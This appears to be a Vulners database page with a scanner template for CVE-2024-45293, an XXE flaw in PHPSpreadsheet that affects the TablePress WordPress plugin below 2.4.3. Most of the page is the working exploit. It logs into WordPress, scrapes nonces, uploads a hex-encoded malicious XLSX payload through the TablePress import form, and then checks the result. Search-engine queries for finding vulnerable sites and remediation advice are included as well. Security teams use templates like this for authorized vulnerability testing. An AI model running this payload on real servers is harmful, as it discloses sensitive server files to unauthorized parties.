| Reporter | Title | Published | Views | Family All 16 |
|---|---|---|---|---|
| CVE-2024-45293 | 7 Oct 202415:03 | – | circl | |
| PhpSpreadsheet 安全漏洞 | 7 Oct 202400:00 | – | cnnvd | |
| CVE-2024-45293 | 7 Oct 202420:03 | – | cve | |
| CVE-2024-45293 XML External Entity Reference (XXE) in PHPSpreadsheet's XLSX reader | 7 Oct 202420:03 | – | cvelist | |
| XXE in PHPSpreadsheet's XLSX reader | 7 Oct 202415:58 | – | github | |
| CVE-2024-45293 | 7 Oct 202420:15 | – | nvd | |
| WordPress TablePress Plugin < 2.4.3 Multiple Vulnerabilities | 10 Feb 202500:00 | – | openvas | |
| CVE-2024-45293 XML External Entity Reference (XXE) in PHPSpreadsheet's XLSX reader | 7 Oct 202420:03 | – | osv | |
| GHSA-6HWR-6V2F-3M88 XXE in PHPSpreadsheet's XLSX reader | 7 Oct 202415:58 | – | osv | |
| Drupal Loft Data Grids module < 7.x-2.7,< 7.x-3.0 - Unauthenticated Sensitive Data Exposure vulnerability | 23 Oct 202400:00 | – | patchstack |
id: CVE-2024-45293
info:
name: TablePress < 2.4.3 - XXE Injection
author: iamnoooob,ritikchaddha
severity: high
description: |
The PHPSpreadsheet library used by the plugin is affected by an XXE as the security scanner that prevents XXE attacks in the XLSX reader can be bypassed by slightly modifying the XML structure, utilizing white spaces. On servers that allow users to upload their own Excel (XLSX) sheets, Server files, and sensitive information can be disclosed by providing a crafted sheet.
impact: |
Successful exploitation could allow an attacker to read sensitive files on the server.
remediation: |
Upgrade TablePress to version 2.4.3 or later to mitigate the vulnerability.
reference:
- https://shaheen.beaconred.net/research/2024/10/25/phpspreadsheet-xxe.html
- https://wpscan.com/vulnerability/c9c13e5b-22ac-44c1-aca7-e2b34238e045/
- https://wordpress.org/plugins/tablepress/
- https://nvd.nist.gov/vuln/detail/CVE-2024-45293
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
cvss-score: 7.5
cve-id: CVE-2024-45293
cwe-id: CWE-611
epss-score: 0.02859
epss-percentile: 0.84991
cpe: cpe:2.3:a:tablepress:tablepress:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 4
vendor: wordpress
product: tablepress
fofa-query: body="/wp-content/plugins/tablepress"
google-query: inurl:"/wp-content/plugins/tablepress"
tags: cve2024,cve,tablepress,wp,wp-plugin,wordpress,xxe,intrusive,vuln
flow: http(1) && http(2)
variables:
payload: "{{hex_decode('504b030414000000080065588959479244b25a010000f004000013001c005b436f6e74656e745f54797065735d2e786d6c55540900032e9656672e96566775780b000104f50100000400000000ad94cb4ec3301045f77c45e42d4a9cb2400835ed82c2122a513e60b0278d55c7b66cf7f5f74c929697d440956e6245f1bd67723de3f17457eb64833e286b0a36ca7296a011562ab32cd8dbe229bd6349886024686bb0607b0c6c3ab91a2ff60e434262130a56c5e8ee390fa2c21a42661d1afa525a5f43a457bfe40ec40a96c86ff2fc960b6b229a98c6c6834dc62fc4f74a6232071f9fa1260cdf691ec90dbbe728233f963c74c2865d30704e2b01910ae71b237f51535b964aa0b4625d93246b6dae1b177e1218e25e63188c0ace23c85021c65a679de9913cc312d63a268f3b72ef32f7a8c379bc43981929db3da152ae8fd0ff43a7759b8141907ee6614badd413fad6fad5bbb5ab4bc7deac590dcaf41d3a89e7debac00935b8006c929328534796e8a3fa3af65eb6b01ecf871f9ba051ff937848bb8d26f076193e583f63fff4ff6bd42af0285fa3a7e6b8f8c47df73ed6c1db0b6bf201504b03040a00000000006978895900000000000000000000000009001c00646f6350726f70732f555409000375ce5667d3ce566775780b000104f50100000400000000504b03041400000008006558895961649db4860100004503000010001c00646f6350726f70732f6170702e786d6c55540900032e9656672e96566775780b000104f501000004000000009d53416edb3010bcf71502ef3165a3280a8362d03a2d7268500376d2f3965a59442892e06e04bbaf2f25c38adce4549e666707c3e19254b7c7ce153d26b2c15762b9284581de84dafa43251ef7df6f3e8b82187c0d2e78acc40949dcea0f6a9b42c4c416a9c80e9e2ad132c7b594645aec8016b9ed73a709a903ce653ac8d034d6e05d302f1d7a96abb2fc24f1c8e86bac6fe26428ce8eeb9effd7b40e66c8474ffb53cc7e5a7d89d159039c0fa91fac498142c3c5b7a341a7e4bca9b2d10ecd4bb27cd2a592f352ed0c38dc6463dd802354f29550f708c3ccb6601369d5f3ba47c3211564ffe4a9ad44f11b08873895e82159f02cceb2733162178993fe15d233b5884c4a4ee408e7da39b61ff5721464702d9453908caf23ee2d3ba49fcd1612bf9378394f3c6610ef657c13f1b2d93ff69bd045f0798672420fe0e1808376423fac7fa6c7b80f77c07819f235a9762d24acf3bd4c973011ea3ea74d2eebbfe6e8c389afeba9a44d0bfe80f5c5e26d6378314fe75fa197ab4599d7f8502e9c92af1f40ff05504b030414000000080065588959edae97d5710100001103000011001c00646f6350726f70732f636f72652e786d6c55540900032e9656672e96566775780b000104f50100000400000000a592514fc3201485dffd150dafa6033663b4e96ae2cc9e343171465f11ae1bae0502576bffbd946e9d53df7c6a4ecfe1e3de13caabcfa6ce3ec0076dcd9cf009231918699536eb39795c2df30b9205144689da1a98930e02b9aa4e4ae90a693ddc7bebc0a38690459009857473b2417405a5416ea011611213269aafd63702a3f46bea84dc8a35d02963e7b401144aa0a03d30772391ec904a8e48f7eeeb045092420d0d180c944f383d64117c13fe3c909c6fc94663e7e0cfe8de1cd39f418fc1b66d27ed2c45e3fc9c3edfdd3ea455736dfaaa2490aa54b2901e045a5f3d9aadb1adc916832ee937afefb11601ef62e3af1ad475f73bfe3b52eed61c30a0b2385e312cb3779e668b9bd5925453363dcbf93467972bce0b362b383f65ac60ac1fe30872a036bb9bfe87dd535217a8b186b85afaaaecc1c53b55d80060aa63b0fba08220bd76189f6395aca31f5187f79737903898a3881d6da16bad57a14a8d1d54ff52e37e6bebbbc1faa18e5e71f505504b0304140000000800367989590e45da9b040400007a54000006001c0068682e7068705554090003f8cf5667fdcf566775780b000104f50100000400000000ed9c4b73da3010c7eff914bda53dc8e8e1671fd3018704f31e0c93de9884b825d30ca4e0f4d40f5f49262458368fd8264e662fc04846dad56ff72fd933ebafdfefa7f72727c1643afff0f3f62e18ff0ac2f1643e0b8359b8fc78ca3b3f572abc230c1615defc375884daf5d532307514cc26f39be0dff6d65bf143b30d431b0dcfade35d7c1394f1e23f0ff330b841f78bdb5978757d17ecb78687b4ee9a21c5dc55b36d3863267a8819ef3299e637bcf3e1b8e9f93f30256c87ab605efee69573fa6d79a1334b1bb93ed2eff61cdc941e20c505cfef998e184cb8d7ae67b1ff48ebe4f66d93243bd3d6b58b1a6118e35847cdbb30b466af51ad298339068ed97cb849fcffb6e6fa7c2d29a6b43578d150db704bd4d1a7ca2805b89188823b8cc923f50c2eb74d6dd4f5dcde595d9980509b8a199037404e9c84eb57c7430363441c9b498f682d3e44c76b891e9ac1bca69f625e5bcf3a7456cfb9096a0e8e45f6a0f59f097e5986e41b4365f6f459e2c5a56b474eaebb89a9d547eef03245c7b245895fa7c91ac54daa751c4ab46eb5dfeefbeaca122e968f2b9880906a1d9f27b1ee6409615dd8c6680256a186629612845f2eaa5ab81ce4686509b71160000c8001300006c00018000360000c8001300006c00018000360000c8001300006c00018000360000c8001300006c00018000360000c8001300006c00018000360000c8001300006c00018000360507e0687155c1eee724add6d5bb622a54a892f8d28d14a2bf58c2a3a53aa4d574bd07063c5a0b9199da1208d87a0bc263e512ee56829e66eaf52238473e7dfc851208882da46cb77fdccb5b329969dd5ddd482655941e8c8624251c58ae2c645b57d8505a6aca54e5412cff7061e633a15b8f4fc672e50c2d292d02c7b0968de91ddf1799bfc2c20aadd3eaa0e6229f32ccdf5a7bc52ace20bce5632cca8222ea2a69451a59e1a0cdf3b659e7647aaf5fc73ae1c5c3d881ad7227a309622cf0ab1f88d6d212b3db6128363d02258b795d3c6da1b4e5e563cabe1e660d3e4ae16a3a3a52ece4e5be7ae17df6c37048d31994b7a015ada1f46ac62cdad9e67a39122a3396aceeb9c3b5fb8e53dbe4925124455e66cd35e3993ed352b698bc533cd4ce4241cda28e95fa79fb4451b6a264176cd1b2ae71c23ed3ee1d8709f0e9d451ddc853d4ef20d47a7ea8e5a059de8d637334999cd83c660bab539f533edacd563e794a82fdabdf8268575c9f65d69914c242771f2368bf646e75d9df9dfe2fe7ad886b1da93f9cdba781f4bb38f2ebd6e1c2dc1052deffa462531f5b92a1896547c71e042dcb6f8b384d559acd9172b6d59c6fb57ca574cfeb22dc531deaa064f0232070d33ad6dc77d4c763f2e8c6e62f3346e7308fe357d98fdde6f82a8b5b20896f387c524f85609c249653a5f86cbd34f5f4efe03504b03040a00000000006978895900000000000000000000000006001c005f72656c732f555409000375ce5667d3ce566775780b000104f50100000400000000504b03041400000008006558895917b63738e90000004b0200000b001c005f72656c732f2e72656c7355540900032e9656672e96566775780b000104f50100000400000000ad92cd6ac3300c80ef7b0aa37ba3b48531469d5ecaa0b732b207d06ce5872496b1bd2d7dfb7987b105bad2c38e96a54f9f8476fb791ad53b87d88bd3b02e4a50ec8cd8deb51a5eeaa7d503a898c8591ac5b1863347d85777bb671e29e59ad8f53eaa0c71514397927f448ca6e38962219e5dfe69244c94f233b4e8c90cd4326ecaf21ec36f06540ba63a5a0de168b7a0eab3e75bd8d234bde18398b7895dbad002794eec2cdb950fb93ea43e0fa36a0a2d270d56cc29872392f74546035e36dadc6ef4f7b43871224b89d048e0eb3e5f19d784d6ffb9a265c68fcd3ce28784e15564f876c1c50d549f504b03040a00000000006978895900000000000000000000000003001c00786c2f555409000375ce566776ce566775780b000104f50100000400000000504b0304140000000800655889595ceeed2eac010000f50200000f001c00786c2f776f726b626f6f6b2e786d6c55540900032e9656672e96566775780b000104f501000004000000008d924b4f1b410c80effd15a3b9975d2a406d940d52a16991fa4025a5e7c9ac97b59897c6de04f8f5f54c929672622f1ebfedcf3b3f7ff04e6d2013c6d0e9e3a3562b0836f618ee3afd6bb57cfb5e2b62137ae362804e3f02e9f3c59bf936e6fb758cf74af267948c155fca409037a08b3150a747e6346b1ab223784347314110cf10b3372c6abe6b48724c4f23007bd7bc6bdbb3c61b0cfb0ab3fc9a1a7118d0c265b49387c0bb22199c615989464ca417f3011ddceeb65426a5efc6cbbc0f4e2b67883ff5c8d077fa44d4b885ff0c794a1f277445396d4f75b3f8bbf97556c20976a55623d2efbda30415798bb0a57ff14555c6326e6065d69d16d266e2b844c7902f0dc3e71ca754b9739e04e28099f8a6a0a9c11e037a7c2a730dc69104d018b75f62c6a718d8b81b9ba37387e4e2abb9d28b9e1b8502a37d19ce66fdb300ebf4592bbd3648b84687fcd8e9fa7650b66a9ead556f76902a540a8540d54b2b115732ebb1309ca13cf2557f528b1c327b1830405f0092d865265b988a28791feaa7abfe4d3877bad0dae917d12707f544527e989cbb10eb8ff0359abeb292dfc3c2726f2f96d2f77088c51f504b03040a0000000000697889590000000000000000000000000e001c00786c2f776f726b7368656574732f555409000375ce5667d3ce566775780b000104f50100000400000000504b0304140000000800655889593bb09071560200001205000018001c00786c2f776f726b7368656574732f7368656574312e786d6c55540900032e9656672e96566775780b000104f501000004000000008d544d4fdc3010bdf75758beb3c9b6f4835536888228485420a0edd9eb4c120b3be3dace66e1d777ec4d9645f4b087289e71e6f9bde79914a71ba3d91a9c57d82df97c9673069dc44a75cd92ff7abc3cfac6990fa2ab84c60e96fc193c3f2d3f1403ba27df020446000b6f85a44debc0835b038fc9ce2f791b825d6499972d18e16768a1a39d1a9d118142d7649e6a4495908cce3ee6f997cc08d58d080b770806d6b5927081b237d0852d88032d0269f2adb27e42db5407e1554e0ca47fe2b347f162bbb3c39b1fbfc3334a3af45887994433527baff2243b79a373630e03828d84ffd864e421ba8c704fbd3d22384bdeac9456e139617166e4e2bae9d08995a67b245d42ee8914efe10f97494865917277ae2cb00f5a7570e798ef0d117afe0e1a07ea3c3e25ee55d38698c8ca22dbd5558aee36362973502ff9d97c7196be481ffc5630f8bd350b62f5001a64802a41c76e5d213ec5cd6b4a5197fb16871f4e5537c4863a35b81eb6c97b1cce515f91109a8a584dc0092b1e2ee8b58673d03a72a082bf239d57b6f18cfdf544ec32dd0409afa016bd0e74ce158c5a8f67c79c8dd6dcc01af47df4247f9b2356313789be10419485c381b9ad7d56c4919b2f226319939120a17b8ad7655e646ba225e9a19a89e016c43ad5855b9be68535afa6d4427b7265977980303a4524ac68e0a7708da21a0d35ede4b3af9cb9ada4b40e68d3ea33672b0c01cd14b5c9dd187de2ac460c5330e2d241bd655658700fea05923e748aa63b0df5928f1e926a2962c7ce7332ab56e111779e8ef11f5585368511f8d6a5732b1cbac716ba5bfaf3a59bdbfdceca7f504b03040a00000000006978895900000000000000000000000014001c00786c2f776f726b7368656574732f5f72656c732f555409000375ce5667d3ce566775780b000104f50100000400000000504b030414000000080065588959cd4b5222780000008d00000023001c00786c2f776f726b7368656574732f5f72656c732f7368656574312e786d6c2e72656c7355540900032e9656672e96566775780b000104f501000004000000004d8c310e022110007b5f41b6f7400b63cc71d7f900a30fd8702b1061212c31fa7b292d27939979fde4a4ded42416b670980c286257b6c8dec2e37edd9f414947de3015260b5f125897dd7ca3847d3412621535262c1642eff5a2b5b84019652a957898676919fbc0e67545f7424ffa68cc49b7ff07e8e507504b0304140000000800655889593df2251dc3010000ed0300000d001c00786c2f7374796c65732e786d6c55540900032e9656672e96566775780b000104f5010000040000000085534d8bdc300cbdf75718dfbb4e065ada25c9d216023d7429ec147a75622563ea2f6c6598f4d7d78e33930cbbd05cfcf4243dc9b2523d5db42267f0415a53d3f2a1a0044c6f8534634d7f1ddbf79f2809c88de0ca1aa8e90c813e35efaa80b38297130092a8f0181cefa3d77908e0cf401369424d4f88ee91b1d09f40f3f0601d98e819acd71ca3e94716620e17212969c50e45f191692e0d6d2a33e9566320bd9d0cd6b4a0aca9066b36a6a49968aa8e9cb95a43e40e07f4f20fec88296313efb2f8ff66bb2c93d55b653df16357d3b62d962fd186eb55e21b57b2f332912c175e8e10db904addfa3ad04c3495e388e04d1b0db2e2e3ec606b80e5b8ff448f9ecfe5e1c32e613962ddce7a111f6f3f914c35958201638297e3299d681d4b4e44ab2310928fd6709524af192b88b23d28f5925ef8f770a77d19487e95ef220d94a4db5f616c688559261b497faf96b55fcb5e86d792f7a5ded627dc3935b7366f48b69e27dd816f9725dbc54481cdfaba686cf6172547a3e1b6686c6d73378bbb966f2c49eb51d3e7544dd1ed1edd24154af3c614a2a6b80cf77b8dbc8bbf53ae2260e093c2e38daae9867f809093fe4caf513fe5d9e21ab5e02d74d969b6fda8cd3f504b03040a00000000006978895900000000000000000000000009001c00786c2f7468656d652f555409000375ce5667d3ce566775780b000104f50100000400000000504b03041400000008006558895973917b59bb050000a61b000013001c00786c2f7468656d652f7468656d65312e786d6c55540900032e9656672e96566775780b000104f50100000400000000ed594f6fdb3614bfef5310bab7b26c2975823a45ecd8ed96a60d12b7438fb4444bac295120e9a4be0ded71c08061ddb0cb80dd7618b61568815dba4f93adc3d601fd0a7bfa639b8aa93469336c43eb832d92bff79feff151be7aed41ccd0211192f2a46339971b162289cf039a841debce7070a96d21a9701260c613d2b166445ad7363fb88a3754446282803c911bb863454aa51bb62d7d98c6f2324f49026b632e62ac6028423b10f808d8c6cc6e361a6b768c6962a104c7c0f5f6784c7d8286194b6b73cebccfe02b51329bf09938f073893a458e0d264ef62367b2c7043ac4ac63819c801f0dc903652186a582858ed5c83f96bd79d55e10315543abd10df24f4957120493664e27c2d182d019b8eb57b617fc9b05ff555cbfdfeff59d05bf1c807d1f2c7556b0eea0ed74e73c3550f1b8cabbd7f01a6e15aff16fade0d7bbddaeb75ec1b796787705df6eacb95bcd0ade5de2bd55fdbb5bbdde5a05ef2df16b2bf8c195f535b78acf4111a3c964059dc57311990564ccd90d23bc0df0f67c032c51b6b6bb0afa44d5edb518dfe76200803cb858d104a9594ac6d8075c0fc723417126006f10acad1453be5c99ca6421e90b9aaa8ef5518a2123969057cf7f78f5fc297af5fcc9f1c367c70f7f3e7ef4e8f8e14f06c21b380975c297df7dfed7379fa03f9f7efbf2f19766bcd4f1bffdf8e9afbf7c61062a1df8e2ab27bf3f7bf2e2ebcffef8feb101be25f048870f694c24ba458ed03e8fc13683003212e7a3184698562870044803b0afa20af0d60c3313ae4baacebb2ba0009880d7a7f72bba1e4462aaa801b813c515e02ee7accb85d19c9d4c966ece3409cdc2c554c7ed637c6892dd3b11dafe34859d4c4d2c7b11a9a8b9c720da38240951285be313420c64f728adf87597fa824b3e56e81e455d4c8d2e19d2913213dda031c465665210425df1cdee5dd4e5ccc47e9b1c56919010989958125671e3753c5538366a8c63a6236f621599943c9809bfe270a920d221611cf50322a589e6b69855d4ddc150898c61df65b3b88a148a4e4cc89b98731db9cd27bd08c7a951679a443af64339812d8ad11e574625783543b231c40127b5e1be4b893a5f5adfa16164de20d9ca54985282f06a3eced81893a4acef954a1dd3e4b4b2cd28d4edf7657b0edf8243cc943c278b751dee7f58a2b7f134d9239015ef2bf4fb0afd2e56e8ba5cbef8babc2cc5b6de6be76ce2dac67b4c193b5033466ecabc884b302f18c0643ec889167d7e1ac16329ae820b05ce9f91e0ea63aaa28308a720c6c92584b2641d4a947209b70bab96777e45a560733ee7cdef9580c66a9707c5744bbf6f2ed8e4a350ea825a1983b30a6b5d793b614e013ca334c7334bf34e95666bde84bc41387b99e0ac350bd1b051302341e6f782c13c2c171e2219e1809431728c8638ad33baadfd7aaf69d2d65b6f27ed2c41d2c5b935e2bc0b885263254af66a3ab2a43a4247a095d7f42ce4e3b4638da1e782c738057e322b55988549c7f25569ca6b93f9a4c1e66de9346a0dae88488554db58460555be347f1d932cf56f7a6ee6878b31c0508dcea645abedfc8b5ad827434bc663e2ab9a99e5b05ce35345c441141ca1119b8a7d0c7abbc5ee0aa884a3a2391f08c850b7dc78d5cc2fb3e0e46b9f323b304b235cd6a4b616fb029e3f2f74c8479a7a768dee6f684aeb024df1de5d53b29d0b0d6e2bc8af5ed006088cb23ddab1b85011872a9446d41f08681c7259a01782b4c854422c7b879de94a0e9775abe05114b93052fb34448242a5539120644f9576be8699d3d4cfd739a3b2ce2cd49569f13b2287840db3ec5dcbecb75034af26a52372dcc9a0d9a6ec1a8583ff70e7e3d6743ea7b7074b41ee797a11572bfada51b0fe762a9cf3a86d9a2d6e7a673e6a53b8a6a0ec0b0a37153e5bf6b743be0fd1478b8e12c146bcd42ed36f3139029ddb9a7119ab7fb68d5a86a05d13ef8b6c3e3567b76a9c7dbab83777b667f0b577baabedd514b5b58b4c3e5af9338b8fee83ec6db81f4d9992c57ba7077029edcdff86003ef69274f36f504b03040a00000000006978895900000000000000000000000009001c00786c2f5f72656c732f555409000375ce5667d3ce566775780b000104f50100000400000000504b0304140000000800655889598424b156e9000000b90200001a001c00786c2f5f72656c732f776f726b626f6f6b2e786d6c2e72656c7355540900032e9656672e96566775780b000104f50100000400000000ad92c16ac3301044effd0ab1f75a765a4a29917329815c5bf70384b4b64c6c4968376dfdf7551b481c08a1079fc4acd899c748ebcdf738884f4cd407afa02a4a10e84db0bdef147c34dbfb6710c4da5b3d048f0a2624d8d477eb371c34e71d727d24914d3c2970ccf1454a320e474d4588e8f34d1bd2a839cbd4c9a8cd5e77285765f924d3dc03ea0b4fb1b30ad2ce56209a29e27fbc43dbf6065f83398ce8f94a84249e86cc2f1a9d3a6405475d641f90d7e3574bc673dec573fa9f3c0eab5b0c0f8b56e07442fbce293ff0bc89f9f816cce392305f21edc921f219e434fa45cdc7a91979f1e3ea1f504b0304140000000800f3798959dca8b940150100004901000014001c00786c2f736861726564537472696e67732e786d6c555409000359d1566759d1566775780b000104f5010000040000000015905d4fc2301885eff9152f4d900b854e8298c856628045302a91294ee345dd5eb6c6ae1d6d27e3df5b2ecf47f2e49c70d65612fed058a15544ae8701015499ce852a22e8bf25f1e0b60fd6719573a91546e48496cc58e7f27e711c74172ff324dd2c61af357c41d85d3e27ab24851eb42dc236dd26cb27207559df51ba17d2a1a1d4a0d58dc930cab9e3de77d83a5a4b2ed4f4875b9c8caf36f3384ee4ebfa3dfe2df8ee26f8fc5837e9ee58ac47b1484f59b15a8c1f0930e879c8f49b75426b1df819ca46a474ee0cb3598915b7435da3f2c95e9b8a3b2f4d416d6d90e7b6447495a4a32098d0cac309344a1c1a9ceb46397f0461a1152c74ec01a5d4b0d346e6702194dfa0b89c4237a48e85f4dca19ecffe01504b01021e0314000000080065588959479244b25a010000f0040000130018000000000001000000a481000000005b436f6e74656e745f54797065735d2e786d6c55540500032e96566775780b000104f50100000400000000504b01021e030a000000000069788959000000000000000000000000090018000000000000001000ed41a7010000646f6350726f70732f555405000375ce566775780b000104f50100000400000000504b01021e031400000008006558895961649db48601000045030000100018000000000001000000a481ea010000646f6350726f70732f6170702e786d6c55540500032e96566775780b000104f50100000400000000504b01021e0314000000080065588959edae97d57101000011030000110018000000000001000000a481ba030000646f6350726f70732f636f72652e786d6c55540500032e96566775780b000104f50100000400000000504b01021e03140000000800367989590e45da9b040400007a540000060018000000000001000000a4817605000068682e7068705554050003f8cf566775780b000104f50100000400000000504b01021e030a000000000069788959000000000000000000000000060018000000000000001000ed41ba0900005f72656c732f555405000375ce566775780b000104f50100000400000000504b01021e031400000008006558895917b63738e90000004b0200000b0018000000000001000000a481fa0900005f72656c732f2e72656c7355540500032e96566775780b000104f50100000400000000504b01021e030a000000000069788959000000000000000000000000030018000000000000001000ed41280b0000786c2f555405000375ce566775780b000104f50100000400000000504b01021e03140000000800655889595ceeed2eac010000f50200000f0018000000000001000000a481650b0000786c2f776f726b626f6f6b2e786d6c55540500032e96566775780b000104f50100000400000000504b01021e030a0000000000697889590000000000000000000000000e0018000000000000001000ed415a0d0000786c2f776f726b7368656574732f555405000375ce566775780b000104f50100000400000000504b01021e03140000000800655889593bb090715602000012050000180018000000000001000000a481a20d0000786c2f776f726b7368656574732f7368656574312e786d6c55540500032e96566775780b000104f50100000400000000504b01021e030a000000000069788959000000000000000000000000140018000000000000001000ed414a100000786c2f776f726b7368656574732f5f72656c732f555405000375ce566775780b000104f50100000400000000504b01021e0314000000080065588959cd4b5222780000008d000000230018000000000001000000a48198100000786c2f776f726b7368656574732f5f72656c732f7368656574312e786d6c2e72656c7355540500032e96566775780b000104f50100000400000000504b01021e03140000000800655889593df2251dc3010000ed0300000d0018000000000001000000a4816d110000786c2f7374796c65732e786d6c55540500032e96566775780b000104f50100000400000000504b01021e030a000000000069788959000000000000000000000000090018000000000000001000ed4177130000786c2f7468656d652f555405000375ce566775780b000104f50100000400000000504b01021e031400000008006558895973917b59bb050000a61b0000130018000000000001000000a481ba130000786c2f7468656d652f7468656d65312e786d6c55540500032e96566775780b000104f50100000400000000504b01021e030a000000000069788959000000000000000000000000090018000000000000001000ed41c2190000786c2f5f72656c732f555405000375ce566775780b000104f50100000400000000504b01021e03140000000800655889598424b156e9000000b90200001a0018000000000001000000a481051a0000786c2f5f72656c732f776f726b626f6f6b2e786d6c2e72656c7355540500032e96566775780b000104f50100000400000000504b01021e03140000000800f3798959dca8b9401501000049010000140018000000000001000000a481421b0000786c2f736861726564537472696e67732e786d6c555405000359d1566775780b000104f50100000400000000504b0506000000001300130055060000a51c00000000')}}"
filename: "{{rand_base(7)}}"
http:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
- |
GET /wp-admin/admin.php?page=tablepress_import HTTP/1.1
Host: {{Hostname}}
extractors:
- type: regex
part: body
name: closedpost
group: 1
regex:
- 'name="closedpostboxesnonce" value="([0-9a-z]+)"'
internal: true
- type: regex
part: body
name: meta_box
group: 1
regex:
- 'name="meta\-box\-order\-nonce" value="([a-z0-9]+)"'
internal: true
- type: regex
name: _wpnonce
part: body
group: 1
regex:
- 'name="_wpnonce" value="([a-z0-9]+)"'
internal: true
- raw:
- |
POST /wp-admin/admin-post.php HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryuVnytOHlVXMXeHFy
------WebKitFormBoundaryuVnytOHlVXMXeHFy
Content-Disposition: form-data; name="closedpostboxesnonce"
{{closedpost}}
------WebKitFormBoundaryuVnytOHlVXMXeHFy
Content-Disposition: form-data; name="meta-box-order-nonce"
{{meta_box}}
------WebKitFormBoundaryuVnytOHlVXMXeHFy
Content-Disposition: form-data; name="_wpnonce"
{{_wpnonce}}
------WebKitFormBoundaryuVnytOHlVXMXeHFy
Content-Disposition: form-data; name="_wp_http_referer"
/wp-admin/admin.php?page=tablepress_import
------WebKitFormBoundaryuVnytOHlVXMXeHFy
Content-Disposition: form-data; name="action"
tablepress_import
------WebKitFormBoundaryuVnytOHlVXMXeHFy
Content-Disposition: form-data; name="import[source]"
file-upload
------WebKitFormBoundaryuVnytOHlVXMXeHFy
Content-Disposition: form-data; name="import_file_upload[]"; filename="{{filename}}.xlsx"
Content-Type: application/vnd.openxmlformats-officedocument.spreadsheetml.sheet
{{payload}}
------WebKitFormBoundaryuVnytOHlVXMXeHFy
Content-Disposition: form-data; name="import[type]"
add
------WebKitFormBoundaryuVnytOHlVXMXeHFy
Content-Disposition: form-data; name="import[legacy_import]"
false
------WebKitFormBoundaryuVnytOHlVXMXeHFy--
- |
GET /wp-admin/admin.php?page=tablepress&action=edit&table_id={{id}} HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'contains(body_2, "Hello World abc")'
- 'status_code_2 == 200'
condition: and
extractors:
- type: regex
name: id
part: location
group: 1
regex:
- 'table_id=([0-9]+)'
internal: true
# digest: 4a0a00473045022100834e95d90e53021f0fc533094d8160eaacab82b38ab506d6e7e4a8e33d98632c02201633c3c9a4b350168e12191cc94c9f139d5b56b392e501bd64ff70a182c04449:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation